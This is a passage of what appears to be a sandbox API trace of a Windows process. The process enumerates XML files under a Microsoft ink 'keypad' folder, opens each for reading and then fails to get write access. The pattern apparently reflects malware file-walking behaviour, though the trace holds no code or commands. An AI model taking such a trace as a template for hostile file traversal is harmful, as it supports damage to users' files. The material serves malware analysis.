Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0083.296] AreFileApisANSI () returned 1 [0083.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad", lpUsedDefaultChar=0x0) returned 72 [0083.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0083.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0083.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0083.296] AreFileApisANSI () returned 1 [0083.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0083.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0083.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad") returned 72 [0083.296] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.296] GetLastError () returned 0x5 [0083.296] GetLastError () returned 0x5 [0083.296] SetLastError (dwErrCode=0x5) [0083.297] GetLastError () returned 0x5 [0083.297] SetLastError (dwErrCode=0x5) [0083.297] GetLastError () returned 0x5 [0083.297] SetLastError (dwErrCode=0x5) [0083.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0083.297] AreFileApisANSI () returned 1 [0083.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0083.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0083.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad") returned 72 [0083.297] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.297] GetLastError () returned 0x5 [0083.297] GetLastError () returned 0x5 [0083.297] SetLastError (dwErrCode=0x5) [0083.297] GetLastError () returned 0x5 [0083.297] SetLastError (dwErrCode=0x5) [0083.297] GetLastError () returned 0x5 [0083.297] SetLastError (dwErrCode=0x5) [0083.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0083.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0083.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0083.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0083.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0083.298] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b5, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="keypad.xml", cAlternateFileName="")) returned 1 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0083.298] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78590 [0083.298] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa063932e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.298] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0x0, dwReserved1=0x0, cFileName="ea.xml", cAlternateFileName="")) returned 1 [0083.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0083.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0083.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0083.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0083.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.299] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.299] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.299] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.299] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.299] AreFileApisANSI () returned 1 [0083.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpUsedDefaultChar=0x0) returned 79 [0083.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0083.299] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.299] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.299] AreFileApisANSI () returned 1 [0083.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0083.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0083.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 79 [0083.299] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.300] GetFileType (hFile=0x340) returned 0x1 [0083.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.300] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.300] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.300] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.301] CloseHandle (hObject=0x340) returned 1 [0083.301] AreFileApisANSI () returned 1 [0083.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0083.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0083.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 79 [0083.301] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.301] GetLastError () returned 0x5 [0083.301] GetLastError () returned 0x5 [0083.301] SetLastError (dwErrCode=0x5) [0083.301] GetLastError () returned 0x5 [0083.301] SetLastError (dwErrCode=0x5) [0083.301] GetLastError () returned 0x5 [0083.301] SetLastError (dwErrCode=0x5) [0083.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0083.301] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.301] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.301] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x387, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="keypadbase.xml", cAlternateFileName="")) returned 1 [0083.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0083.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0083.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0083.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.302] AreFileApisANSI () returned 1 [0083.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpUsedDefaultChar=0x0) returned 87 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0083.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0083.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.303] AreFileApisANSI () returned 1 [0083.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0083.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81918 [0083.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x81918, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 87 [0083.303] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.303] GetFileType (hFile=0x340) returned 0x1 [0083.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81918 | out: hHeap=0x20000) returned 1 [0083.303] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.303] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.303] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.304] CloseHandle (hObject=0x340) returned 1 [0083.304] AreFileApisANSI () returned 1 [0083.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0083.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x811e8 [0083.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x811e8, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 87 [0083.304] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.304] GetLastError () returned 0x5 [0083.304] GetLastError () returned 0x5 [0083.304] SetLastError (dwErrCode=0x5) [0083.304] GetLastError () returned 0x5 [0083.304] SetLastError (dwErrCode=0x5) [0083.304] GetLastError () returned 0x5 [0083.304] SetLastError (dwErrCode=0x5) [0083.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x811e8 | out: hHeap=0x20000) returned 1 [0083.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0083.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.305] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.305] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="kor-kor.xml", cAlternateFileName="")) returned 1 [0083.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.305] RtlAllocateHeap 